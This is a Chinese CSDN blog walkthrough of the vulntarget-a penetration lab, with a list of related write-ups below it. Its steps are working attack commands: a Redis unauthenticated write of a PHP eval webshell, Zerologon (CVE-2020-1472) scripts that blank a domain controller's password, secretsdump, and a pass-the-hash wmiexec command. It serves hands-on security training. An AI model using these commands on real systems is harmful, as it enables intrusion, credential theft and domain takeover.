vulntarget-a靶场

最新推荐文章于 2024-06-14 09:49:50 发布
最新推荐文章于 2024-06-14 09:49:50 发布
阅读量210 收藏
点赞数
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shajianlong666/article/details/131451118
版权

1、主机发现

arp-scan -l

2、端口发现

nmap -sS -sV -O -Pn -A 192.168.0.23

3、可以考虑用永恒之蓝直接打,但发现是80端口是通达OA,直接用工具上

4、蚁剑连接,配合cs上线

5、信息收集(systeminfo、主机发现、端口、域、密码)

发现并不在域中,但有一个同网段的内网主机

6、发现redis6379端口

尝试redis

由于无法直接访问10.0.20.99,需设置代理

7、kali中设置代理

/etc/proxychains4.conf

8、代理火狐打开10.0.20.99

9、扫网站目录,发现phpinfo.php(网站绝对路径)

proxychains dirb http://10.0.20.99

访问http://10.0.20.99/phpinfo.php

10、kali中redis连接

proxychains redis-cli -h 10.0.20.99    //kali未授权登录


config set dir "C:/phpStudy/PHPTutorial/WWW/"     //redis写shell
config set dbfilename tx.php
set 1 "<?php @eval($_POST['tx']);?>"
save

11、蚁剑挂代理连接

12、win2016上线cs

由于kali与win2016不在一个网段,无法直接上线,需要在cs中已上线的win7中设置监听(因为win7和win2016有一个网段一样)

必须选择x64,否则执行不了(如果还不行,把win7防火墙关掉)

cs上线

13、信息收集(systeminfo、主机发现、端口、域、密码)

 

在vulntarget.com域中

域管理员:Administrator

域控主机:win2019

域成员:win2016

14、使用CVE-2020-1472(域内提权)拿域控

可以尝试使用永恒之蓝试试(大概率不行)

此处是直接使用CVE-2020-1472(域内提权)

首先cs设置个代理

这里的代理写错了,是39999(cs中设置的代理要和小帽子中要一致)

小帽子测试连接(虽然是接收数据错误,但不影响)

小帽子中打开命令提示符

(1) 检测域控是否存在漏洞

python3 zerologon_check_vulnerable.py win2019 10.0.10.110

存在漏洞

(2)使用exp将域控密码重置为空 , 这一步会把域控的密码置为空

python3 zero-logon-exploit.py win2019 10.0.10.110

(3) 然后使用空密码获取hash

python3 secretsdump.py -no-pass "vulntarget/win2019$@10.0.10.110"

(4)cs上线

或用wmiexec.exe

wmiexec.exe -hashes 00000000000000000000000000000000:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

成功!

xxzjl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6033
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
VulnTarget-a
大熊
06-16 554
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
[vulntarget靶场] vulntarget-a
qq_43884092的博客
09-17 480
永恒之蓝,通达oa后台getshell,redis未授权访问写入webshell,cve-2020-1472
巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我
XYpangSJ的博客
06-01 954
ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144。配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成。使用proxychains4对10.0.20.99进行端口扫描。修改etc/proxychains4.conf。用procychains4代理使用哥斯拉连接。开放了80端口访问一下phpinfo.php。使用redis未授权访问xieshell。点击target,选择add,如下填写。使用socks_proxy做代理
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6515
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-bypass靶场
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1005
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 6958
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
【勒索来袭】vulntarget-n靶场搭建& 打靶流程
crowsec
06-12 1093
vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例,其模拟了一个正常运行的业务服务被勒索病毒攻击的情景
Vulntarget-a靶场实战记录
最新发布
weixin_50398751的博客
06-14 1211
网络结构:域控、内网、外网 使用技术:通达OA系统漏洞 、Redis未授权访问漏洞 、ms17-010永恒之蓝 、代理转发内网跳板、 CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动 、msfconsole、cobalt strike
vultarget-a靶场渗透
Christ1na的博客
12-30 360
CVE-2020-1472影响win server2008r到win2019多个操作系统版本,只需要得到域控的用户名且能够访问到目标域控,漏洞不需要主机在域环境下,原理是通过将目标域控密码置空,根据获取的凭得到域管理员的权限。可以发现此win7主机存在双网卡,192.168.14.0为外网环境,10.0.20.0为内网环境。web服务器地址为http://192.168.14.137/,很明显该网站属于通达oa。使用redis写shell,网站绝对路径可在phpinfo界面中获取。使用蚁剑连接shell。
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 4883
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
sstl-lab靶场
09-02
sstl-lab靶场是一个实验室环境,用于研究和测试SSTL(Stub Series Terminated Logic)接口标准。SSTL接口标准是针对高速内存(特别是SDRAM)接口而设计的,旨在提高信号完整性。sstl-lab靶场可能包含了使用SSTL接口标准进行测试的设备和工具。根据引用,SSTL接口标准是由JEDEC认可的标准之一,其中规定了不同电压标准(如SSTL_3、SSTL_2和SSTL_18)。目前没有找到具体关于sstl-lab靶场的更多信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [DDR2 SSTL_18标准](https://blog.csdn.net/tyshtang/article/details/21193023)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入](https://blog.csdn.net/YouthBelief/article/details/123274250)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xxzjl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值